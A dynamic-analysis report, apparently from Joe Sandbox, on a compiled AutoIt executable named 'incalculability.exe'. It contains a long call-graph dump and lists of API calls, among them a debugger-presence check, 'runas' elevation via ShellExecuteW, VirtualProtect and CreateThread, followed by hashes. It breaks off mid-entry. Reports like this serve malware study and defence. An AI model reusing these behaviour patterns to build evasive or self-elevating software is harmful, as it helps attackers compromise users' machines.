317 API calls 86091->86098 86587 453443 52 API calls 86092->86587 86094 42a42f 86595 45e737 90 API calls 3 library calls 86094->86595 86117 40a0af 86095->86117 86596 40c790 VariantClear ctype 86095->86596 86100 408f40 VariantClear 86096->86100 86098->86095 86099->85016 86104 4299e2 86100->86104 86101 429d88 86588 453443 52 API calls 86101->86588 86583 410c60 VariantClear ctype 86104->86583 86106->86057 86108->86049 86110->86090 86111 4115d7 52 API calls 86111->86137 86112 402780 52 API calls 86112->86137 86113 44a801 52 API calls 86113->86137 86115 408f40 VariantClear 86145 40a162 ctype _memmove 86115->86145 86116 41130a 51 API calls __cinit 86116->86137 86118 40a11b 86117->86118 86120 42a4b4 VariantClear 86117->86120 86117->86145 86125 40a12d ctype 86118->86125 86597 40e270 VariantClear ctype 86118->86597 86119 40a780 194 API calls 86119->86137 86120->86125 86121 401980 53 API calls 86121->86137 86122 408e80 VariantClear 86122->86137 86124 4115d7 52 API calls 86124->86145 86125->86124 86125->86145 86126 408e80 VariantClear 86126->86145 86128 42a74d VariantClear 86128->86145 86129 40a368 86130 42aad4 86129->86130 86139 40a397 86129->86139 86600 46fe90 VariantClear VariantClear ctype 86130->86600 86594 47390f VariantClear 86131->86594 86132 42a886 VariantClear 86132->86145 86133 42a7e4 VariantClear 86133->86145 86134 40a3ce 86149 40a3d9 ctype 86134->86149 86601 40b400 VariantClear VariantClear ctype 86134->86601 86136 409c95 86136->85016 86137->86074 86137->86094 86137->86108 86137->86111 86137->86112 86137->86113 86137->86116 86137->86119 86137->86121 86137->86122 86137->86131 86137->86136 86592 45f508 52 API calls 86137->86592 86593 403e10 53 API calls 86137->86593 86138 40e270 VariantClear 86138->86145 86139->86134 86161 40a42c ctype 86139->86161 86580 40b400 VariantClear VariantClear ctype 86139->86580 86142 4115d7 52 API calls 86142->86145 86143 42abaf 86147 42abd4 VariantClear 86143->86147 86155 40a4ee ctype 86143->86155 86144 4115d7 52 API calls 86148 42a5a6 VariantInit VariantCopy 86144->86148 86145->86115 86145->86126 86145->86128 86145->86129 86145->86130 86145->86132 86145->86133 86145->86138 86145->86142 86145->86144 86598 470870 52 API calls 86145->86598 86599 44ccf1 VariantClear ctype 86145->86599 86146 40a4dc 86146->86155 86603 40e270 VariantClear ctype 86146->86603 86147->86155 86148->86145 86151 42a5c6 VariantClear 86148->86151 86150 40a41a 86149->86150 86157 42ab44 VariantClear 86149->86157 86149->86161 86150->86161 86602 40e270 VariantClear ctype 86150->86602 86151->86145 86152 42ac4f 86158 42ac79 VariantClear 86152->86158 86163 40a546 ctype 86152->86163 86155->86152 86156 40a534 86155->86156 86156->86163 86604 40e270 VariantClear ctype 86156->86604 86157->86161 86158->86163 86160 42ad28 86165 42ad4e VariantClear 86160->86165 86170 40a583 ctype 86160->86170 86161->86143 86161->86146 86163->86160 86164 40a571 86163->86164 86164->86170 86605 40e270 VariantClear ctype 86164->86605 86165->86170 86167 40a650 ctype 86167->85016 86168 42ae0e VariantClear 86168->86170 86170->86167 86170->86168 86606 40e270 VariantClear ctype 86170->86606 86171->85016 86172->84964 86173->84968 86174->85016 86175->85016 86176->85016 86177->85016 86178->85011 86179->85011 86180->85011 86181->85011 86182->85011 86183->85011 86184->85011 86186 403cdf 86185->86186 86187 408f40 VariantClear 86186->86187 86188 403ce7 86187->86188 86188->85008 86189->85011 86190->85011 86191->85016 86192->84961 86194 408e88 86193->86194 86196 408e94 86193->86196 86195 408f40 VariantClear 86194->86195 86195->86196 86197 45340c 85 API calls 86196->86197 86197->85917 86198->85921 86199->85923 86200->85925 86201->85908 86202->85916 86203->85937 86204->85934 86205->85954 86206->85955 86207->85916 86209 40a7a6 86208->86209 86210 40ae8c 86208->86210 86211 4115d7 52 API calls 86209->86211 86251 41130a 51 API calls __cinit 86210->86251 86230 40a7c6 ctype _memmove 86211->86230 86213 40a86d 86225 40abd1 86213->86225 86228 40a878 ctype 86213->86228 86214 408e80 VariantClear 86214->86230 86215 401b10 52 API calls 86215->86230 86217 40bc10 53 API calls 86217->86230 86218 42b791 VariantClear 86218->86230 86219 40a884 ctype 86219->85954 86220 4115d7 52 API calls 86220->86230 86221 42ba2d VariantClear 86221->86230 86222 408f40 VariantClear 86222->86228 86223 40e270 VariantClear 86223->86230 86224 42b459 VariantClear 86224->86230 86256 45e737 90 API calls 3 library calls 86225->86256 86226 408cc0 187 API calls 86226->86230 86227 42b6f6 VariantClear 86227->86230 86228->86219 86228->86222 86230->86213 86230->86214 86230->86215 86230->86217 86230->86218 86230->86220 86230->86221 86230->86223 86230->86224 86230->86225 86230->86226 86230->86227 86232 42bbf5 86230->86232 86233 42bb6a 86230->86233 86234 4115d7 52 API calls 86230->86234 86235 40b5f0 89 API calls 86230->86235 86239 408f40 VariantClear 86230->86239 86243 42bc37 86230->86243 86248 4530c9 VariantClear 86230->86248 86252 45308a 53 API calls 86230->86252 86253 470870 52 API calls 86230->86253 86254 457f66 87 API calls __write_nolock 86230->86254 86255 472f47 127 API calls 86230->86255 86231 42bc5b 86231->85954 86257 45e737 90 API calls 3 library calls 86232->86257 86259 44b92d VariantClear 86233->86259 86237 42b5b3 VariantInit VariantCopy 86234->86237 86235->86230 86237->86230 86240 42b5d7 VariantClear 86237->86240 86239->86230 86240->86230 86258 45e737 90 API calls 3 library calls 86243->86258 86246 42bc48 86246->86233 86247 408f40 VariantClear 86246->86247 86247->86233 86248->86230 86249->85942 86250->85945 86251->86230 86252->86230 86253->86230 86254->86230 86255->86230 86256->86233 86257->86233 86258->86246 86259->86231 86260->85966 86261->85967 86262->85981 86263->85983 86264->85970 86265->85990 86266->86016 86267->85990 86268->86018 86269->85990 86270->86018 86271->86000 86272->86018 86273->86004 86274->86018 86275->86018 86276->85998 86278 4289d2 86277->86278 86279 408db3 86277->86279 86308 45e737 90 API calls 3 library calls 86278->86308 86306 40bec0 90 API calls 86279->86306 86282 4289e5 86309 45e737 90 API calls 3 library calls 86282->86309 86283 408e5a 86283->86024 86286 428a05 86287 408f40 VariantClear 86286->86287 86287->86283 86288 40a780 194 API calls 86291 408dc9 86288->86291 86289 408e64 86290 408f40 VariantClear 86289->86290 86290->86283 86291->86282 86291->86283 86291->86286 86291->86288 86291->86289 86292 408f40 VariantClear 86291->86292 86307 40ba10 52 API calls 2 library calls 86291->86307 86292->86291 86294 408f40 VariantClear 86293->86294 86295 403d20 86294->86295 86296 403cd0 VariantClear 86295->86296 86297 403d4d 86296->86297 86299 4013c0 52 API calls 86297->86299 86310 46e91c 86297->86310 86313 467897 86297->86313 86357 45e17d 86297->86357 86367 4755ad 86297->86367 86298 403d76 86298->86021 86298->86030 86299->86298 86304->86021 86305->86023 86306->86291 86307->86291 86308->86282 86309->86286 86370 46e785 86310->86370 86312 46e92f 86312->86298 86314 4678bb 86313->86314 86342 467954 86314->86342 86472 45340c 85 API calls 86314->86472 86315 4115d7 52 API calls 86317 467989 86315->86317 86318 467995 86317->86318 86476 40da60 53 API calls 86317->86476 86322 4533eb 85 API calls 86318->86322 86319 4678f6 86321 413a0e __wsplitpath 46 API calls 86319->86321 86323 4678fc 86321->86323 86324 4679b7 86322->86324 86325 401b10 52 API calls 86323->86325 86326 40de40 60 API calls 86324->86326 86327 46790c 86325->86327 86328 4679c3 86326->86328 86473 40d200 52 API calls 2 library calls 86327->86473 86330 4679c7 GetLastError 86328->86330 86331 467a05 86328->86331 86333 403cd0 VariantClear 86330->86333 86334 467a2c 86331->86334 86335 467a4b 86331->86335 86332 467917 86332->86342 86474 4339fa GetFileAttributesW FindFirstFileW FindClose 86332->86474 86336 4679dc 86333->86336 86338 4115d7 52 API calls 86334->86338 86339 4115d7 52 API calls 86335->86339 86340 4679e6 86336->86340 86346 44ae3e CloseHandle 86336->86346 86344 467a31 86338->86344 86345 467a49 86339->86345 86348 408f40 VariantClear 86340->86348 86341 467928 86341->86342 86347 46792f 86341->86347 86342->86315 86343 467964 86342->86343 86343->86298 86477 436299 52 API calls 2 library calls 86344->86477 86353 408f40 VariantClear 86345->86353 86346->86340 86475 4335cd 56 API calls 3 library calls 86347->86475 86349 4679ed 86348->86349 86349->86298 86352 467939 86352->86342 86355 408f40 VariantClear 86352->86355 86354 467a88 86353->86354 86354->86298 86356 467947 86355->86356 86356->86342 86358 45e198 86357->86358 86359 45e19c 86358->86359 86360 45e1b8 86358->86360 86361 408f40 VariantClear 86359->86361 86362 45e1cc 86360->86362 86363 45e1db FindClose 86360->86363 86364 45e1a4 86361->86364 86365 45e1d9 ctype 86362->86365 86366 44ae3e CloseHandle 86362->86366 86363->86365 86364->86298 86365->86298 86366->86365 86478 475077 86367->86478 86369 4755c0 86369->86298 86371 46e7a2 86370->86371 86372 4115d7 52 API calls 86371->86372 86375 46e802 86371->86375 86373 46e7ad 86372->86373 86374 46e7b9 86373->86374 86418 40da60 53 API calls 86373->86418 86419 4533eb 86374->86419 86376 46e7e5 86375->86376 86383 46e82f 86375->86383 86378 408f40 VariantClear 86376->86378 86379 46e7ea 86378->86379 86379->86312 86382 46e8b5 86411 4680ed 86382->86411 86383->86382 86386 46e845 86383->86386 86389 4533eb 85 API calls 86386->86389 86388 46e8bb 86415 443fbe 86388->86415 86399 46e84b 86389->86399 86390 46e7db 86390->86376 86435 44ae3e 86390->86435 86391 46e87a 86438 4689f4 59 API calls 86391->86438 86395 46e883 86397 4013c0 52 API calls 86395->86397 86398 46e88f 86397->86398 86401 40e0a0 52 API calls 86398->86401 86399->86391 86399->86395 86400 408f40 VariantClear 86410 46e881 86400->86410 86402 46e899 86401->86402 86439 40d200 52 API calls 2 library calls 86402->86439 86404 46e911 86404->86312 86405 46e8a5 86440 4689f4 59 API calls 86405->86440 86407 46e903 86409 44ae3e CloseHandle 86407->86409 86409->86404 86410->86404 86441 40da20 86410->86441 86412 468100 86411->86412 86413 4680fa 86411->86413 86412->86388 86445 467ac4 55 API calls 2 library calls 86413->86445 86446 443e36 86415->86446 86417 443fd3 86417->86400 86417->86410 86418->86374 86420 453404 86419->86420 86421 4533f8 86419->86421 86423 40de40 86420->86423 86421->86420 86453 4531b1 85 API calls 5 library calls 86421->86453 86424 40da20 CloseHandle 86423->86424 86425 40de4e 86424->86425 86454 40f110 86425->86454 86427 4264fa 86430 40de84 86463 40e080 SetFilePointerEx SetFilePointerEx 86430->86463 86432 40de8b 86464 40f160 SetFilePointerEx SetFilePointerEx WriteFile 86432->86464 86434 40de90 86434->86383 86434->86390 86436 44ae4b ctype 86435->86436 86466 443fdf 86435->86466 86436->86376 86438->86410 86439->86405 86440->86410 86442 40da37 86441->86442 86443 40da29 86441->86443 86442->86443 86444 40da3c CloseHandle 86442->86444 86443->86407 86444->86407 86445->86412 86449 443e19 86446->86449 86450 443e26 86449->86450 86451 443e32 WriteFile 86449->86451 86452 443db4 SetFilePointerEx SetFilePointerEx 86450->86452 86451->86417 86452->86451 86453->86420 86455 40f125 CreateFileW 86454->86455 86456 42630c 86454->86456 86458 40de74 86455->86458 86457 426311 CreateFileW 86456->86457 86456->86458 86457->86458 86459 426337 86457->86459 86458->86427 86462 40dea0 55 API calls ctype 86458->86462 86465 40df90 SetFilePointerEx SetFilePointerEx 86459->86465 86461 426342 86461->86458 86462->86430 86463->86432 86464->86434 86465->86461 86467 40da20 CloseHandle 86466->86467 86468 443feb 86467->86468 86471 4340db CloseHandle ctype 86468->86471 86470 444001 86470->86436 86471->86470 86472->86319 86473->86332 86474->86341 86475->86352 86476->86318 86477->86345 86479 4533eb 85 API calls 86478->86479 86480 4750b8 86479->86480 86481 4750ee 86480->86481 86482 475129 86480->86482 86484 408f40 VariantClear 86481->86484 86531 4646e0 86482->86531 86489 4750f5 86484->86489 86485 47515e 86486 475162 86485->86486 86518 47518e 86485->86518 86487 408f40 VariantClear 86486->86487 86520 475169 86487->86520 86488 475357 86490 475365 86488->86490 86491 4754ea 86488->86491 86489->86369 86565 44b3ac 57 API calls 86490->86565 86571 464812 92 API calls 86491->86571 86495 4754fc 86496 475374 86495->86496 86498 475508 86495->86498 86544 430d31 86496->86544 86497 4533eb 85 API calls 86497->86518 86500 408f40 VariantClear 86498->86500 86503 47550f 86500->86503 86501 475388 86551 4577e9 86501->86551 86503->86520 86505 47539e 86559 410cfc 86505->86559 86506 475480 86508 408f40 VariantClear 86506->86508 86508->86520 86516 4754b5 86517 408f40 VariantClear 86516->86517 86517->86520 86518->86488 86518->86497 86518->86506 86518->86516 86563 436299 52 API calls 2 library calls 86518->86563 86564 463ad5 64 API calls __wcsicoll 86518->86564 86520->86369 86574 4536f7 53 API calls 86531->86574 86533 4646fc 86575 4426cd 59 API calls _wcslen 86533->86575 86535 464711 86537 40bc70 52 API calls 86535->86537 86543 46474b 86535->86543 86538 46472c 86537->86538 86576 461465 52 API calls _memmove 86538->86576 86540 464741 86541 40c600 52 API calls 86540->86541 86541->86543 86542 464793 86542->86485 86543->86542 86577 463ad5 64 API calls __wcsicoll 86543->86577 86545 430db2 86544->86545 86546 430d54 86544->86546 86545->86501 86547 4115d7 52 API calls 86546->86547 86548 430d74 86547->86548 86549 430da9 86548->86549 86550 4115d7 52 API calls 86548->86550 86549->86501 86550->86548 86552 457a84 86551->86552 86558 45780c _strcat _wcslen _wcscpy ctype 86551->86558 86552->86505 86553 443006 57 API calls 86553->86558 86555 4135bb 46 API calls _malloc 86555->86558 86556 45340c 85 API calls 86556->86558 86557 40f6f0 54 API calls 86557->86558 86558->86552 86558->86553 86558->86555 86558->86556 86558->86557 86578 44b3ac 57 API calls 86558->86578 86561 410d11 86559->86561 86560 410da9 VirtualProtect 86562 410d77 86560->86562 86561->86560 86561->86562 86563->86518 86564->86518 86565->86496 86571->86495 86574->86533 86575->86535 86576->86540 86577->86542 86578->86558 86579->86040 86580->86134 86581->86056 86582->86090 86583->86167 86584->86090 86585->86090 86586->86076 86587->86101 86588->86067 86589->86071 86590->86077 86591->86137 86592->86137 86593->86137 86594->86094 86595->86106 86596->86095 86597->86125 86598->86145 86599->86145 86600->86134 86601->86149 86602->86161 86603->86155 86604->86163 86605->86170 86606->86170 86607->86106 86608->86060 86609 42d154 86613 480a8d 86609->86613 86611 42d161 86612 480a8d 194 API calls 86611->86612 86612->86611 86614 480ae4 86613->86614 86615 480b26 86613->86615 86617 480aeb 86614->86617 86618 480b15 86614->86618 86616 40bc70 52 API calls 86615->86616 86640 480b2e 86616->86640 86619 480aee 86617->86619 86620 480b04 86617->86620 86646 4805bf 194 API calls 86618->86646 86619->86615 86622 480af3 86619->86622 86645 47fea2 194 API calls __itow_s 86620->86645 86644 47f135 194 API calls 86622->86644 86624 480aff 86627 408f40 VariantClear 86624->86627 86625 40e0a0 52 API calls 86625->86640 86629 481156 86627->86629 86631 408f40 VariantClear 86629->86631 86630 40c2c0 52 API calls 86630->86640 86632 48115e 86631->86632 86632->86611 86633 40e710 53 API calls 86633->86640 86634 401980 53 API calls 86634->86640 86636 480ff5 86652 45e737 90 API calls 3 library calls 86636->86652 86637 408e80 VariantClear 86637->86640 86638 40a780 194 API calls 86638->86640 86640->86624 86640->86625 86640->86630 86640->86633 86640->86634 86640->86636 86640->86637 86640->86638 86647 45377f 52 API calls 86640->86647 86648 45e951 53 API calls 86640->86648 86649 40e830 53 API calls 86640->86649 86650 47925f 53 API calls 86640->86650 86651 47fcff 194 API calls 86640->86651 86644->86624 86645->86624 86646->86624 86647->86640 86648->86640 86649->86640 86650->86640 86651->86640 86652->86624 86653 42b14b 86660 40bc10 86653->86660 86655 42b159 86656 4096a0 331 API calls 86655->86656 86657 42b177 86656->86657 86671 44b92d VariantClear 86657->86671 86659 42bc5b 86661 40bc24 86660->86661 86662 40bc17 86660->86662 86664 40bc2a 86661->86664 86665 40bc3c 86661->86665 86663 408e80 VariantClear 86662->86663 86666 40bc1f 86663->86666 86667 408e80 VariantClear 86664->86667 86668 4115d7 52 API calls 86665->86668 86666->86655 86669 40bc33 86667->86669 86670 40bc43 86668->86670 86669->86655 86670->86655 86671->86659 86672 425b2b 86677 40f000 86672->86677 86676 425b3a 86678 4115d7 52 API calls 86677->86678 86679 40f007 86678->86679 86680 4276ea 86679->86680 86686 40f030 86679->86686 86685 41130a 51 API calls __cinit 86685->86676 86687 40f039 86686->86687 86689 40f01a 86686->86689 86716 41130a 51 API calls __cinit 86687->86716 86690 40e500 86689->86690 86691 40bc70 52 API calls 86690->86691 86692 40e515 GetVersionExW 86691->86692 86693 402160 52 API calls 86692->86693 86694 40e557 86693->86694 86717 40e660 86694->86717 86700 427674 86704 4276c6 GetSystemInfo 86700->86704 86702 40e5e0 86706 4276d5 GetSystemInfo 86702->86706 86731 40efd0 86702->86731 86703 40e5cd GetCurrentProcess 86738 40ef20 LoadLibraryA GetProcAddress 86703->86738 86704->86706 86709 40e629 86735 40ef90 86709->86735 86712 40e641 FreeLibrary 86713 40e644 86712->86713 86714 40e653 FreeLibrary 86713->86714 86715 40e656 86713->86715 86714->86715 86715->86685 86716->86689 86718 40e667 86717->86718 86719 42761d 86718->86719 86720 40c600 52 API calls 86718->86720 86721 40e55c 86720->86721 86722 40e680 86721->86722 86723 40e687 86722->86723 86724 427616 86723->86724 86725 40c600 52 API calls 86723->86725 86726 40e566 86725->86726 86726->86700 86727 40ef60 86726->86727 86728 40e5c8 86727->86728 86729 40ef66 LoadLibraryA 86727->86729 86728->86702 86728->86703 86729->86728 86730 40ef77 GetProcAddress 86729->86730 86730->86728 86732 40e620 86731->86732 86733 40efd6 LoadLibraryA 86731->86733 86732->86704 86732->86709 86733->86732 86734 40efe7 GetProcAddress 86733->86734 86734->86732 86739 40efb0 LoadLibraryA GetProcAddress 86735->86739 86737 40e632 GetNativeSystemInfo 86737->86712 86737->86713 86738->86702 86739->86737 86740 425b5e 86745 40c7f0 86740->86745 86744 425b6d 86780 40db10 52 API calls 86745->86780 86747 40c82a 86781 410ab0 6 API calls 86747->86781 86749 40c86d 86750 40bc70 52 API calls 86749->86750 86751 40c877 86750->86751 86752 40bc70 52 API calls 86751->86752 86753 40c881 86752->86753 86754 40bc70 52 API calls 86753->86754 86755 40c88b 86754->86755 86756 40bc70 52 API calls 86755->86756 86757 40c8d1 86756->86757 86758 40bc70 52 API calls 86757->86758 86759 40c991 86758->86759 86782 40d2c0 52 API calls 86759->86782 86761 40c99b 86783 40d0d0 53 API calls 86761->86783 86763 40c9c1 86764 40bc70 52 API calls 86763->86764 86765 40c9cb 86764->86765 86784 40e310 53 API calls 86765->86784 86767 40ca28 86768 408f40 VariantClear 86767->86768 86769 40ca30 86768->86769 86770 408f40 VariantClear 86769->86770 86771 40ca38 GetStdHandle 86770->86771 86772 429630 86771->86772 86773 40ca87 86771->86773 86772->86773 86774 429639 86772->86774 86779 41130a 51 API calls __cinit 86773->86779 86785 4432c0 57 API calls 86774->86785 86776 429641 86786 44b6ab CreateThread 86776->86786 86778 42964f CloseHandle 86778->86773 86779->86744 86780->86747 86781->86749 86782->86761 86783->86763 86784->86767 86785->86776 86786->86778 86787 44b5cb 58 API calls 86786->86787 86788 425b6f 86793 40dc90 86788->86793 86792 425b7e 86794 40bc70 52 API calls 86793->86794 86795 40dd03 86794->86795 86801 40f210 86795->86801 86797 40dd96 86798 40ddb7 86797->86798 86804 40dc00 52 API calls 2 library calls 86797->86804 86800 41130a 51 API calls __cinit 86798->86800 86800->86792 86805 40f250 RegOpenKeyExW 86801->86805 86803 40f230 86803->86797 86804->86797 86806 425e17 86805->86806 86807 40f275 RegQueryValueExW 86805->86807 86806->86803 86808 40f2c3 RegCloseKey 86807->86808 86809 40f298 86807->86809 86808->86803 86810 40f2a9 RegCloseKey 86809->86810 86811 425e1d 86809->86811 86810->86803

                            Executed Functions

                            Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                            Download Yara Rule
                            APIs
                            • _wcslen.LIBCMT ref: 004096C1
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • _memmove.LIBCMT ref: 0040970C
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                            • _memmove.LIBCMT ref: 00409D96
                            • _memmove.LIBCMT ref: 0040A6C4
                            • _memmove.LIBCMT ref: 004297E5
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                            • String ID:
                            • API String ID: 2383988440-0
                            • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                            • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                            • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                            • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                            Function 0040D590 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                              • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\inhumate\incalculability.exe,00000104,?), ref: 00401F4C
                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                              • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                            • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                            • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Local\inhumate\incalculability.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                              • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                            • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                            • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                            • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                            • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                              • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                              • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                              • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                              • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                              • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                              • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                              • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                              • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                              • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                              • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                              • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                              • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                            • String ID: C:\Users\user\AppData\Local\inhumate\incalculability.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                            • API String ID: 2495805114-444942770
                            • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                            • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                            • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                            • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                            Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1921 427693-427696 1915->1921 1922 427688-427691 1915->1922 1920 4276b4-4276be 1916->1920 1923 427625-427629 1917->1923 1924 40e59c-40e59f 1917->1924 1935 40e5ec-40e60c 1918->1935 1936 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1936 1937 4276c6-4276ca GetSystemInfo 1920->1937 1921->1920 1927 427698-4276a8 1921->1927 1922->1920 1929 427636-427640 1923->1929 1930 42762b-427631 1923->1930 1925 40e5a5-40e5ae 1924->1925 1926 427654-427657 1924->1926 1931 40e5b4 1925->1931 1932 427645-42764f 1925->1932 1926->1918 1938 42765d-42766f 1926->1938 1933 4276b0 1927->1933 1934 4276aa-4276ae 1927->1934 1929->1918 1930->1918 1931->1918 1932->1918 1933->1920 1934->1920 1940 40e612-40e623 call 40efd0 1935->1940 1941 4276d5-4276df GetSystemInfo 1935->1941 1936->1935 1948 40e5e8 1936->1948 1937->1941 1938->1918 1940->1937 1946 40e629-40e63f call 40ef90 GetNativeSystemInfo 1940->1946 1950 40e641-40e642 FreeLibrary 1946->1950 1951 40e644-40e651 1946->1951 1948->1935 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                            APIs
                            • GetVersionExW.KERNEL32(?), ref: 0040E52A
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                            • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                            • FreeLibrary.KERNEL32(?), ref: 0040E642
                            • FreeLibrary.KERNEL32(?), ref: 0040E654
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
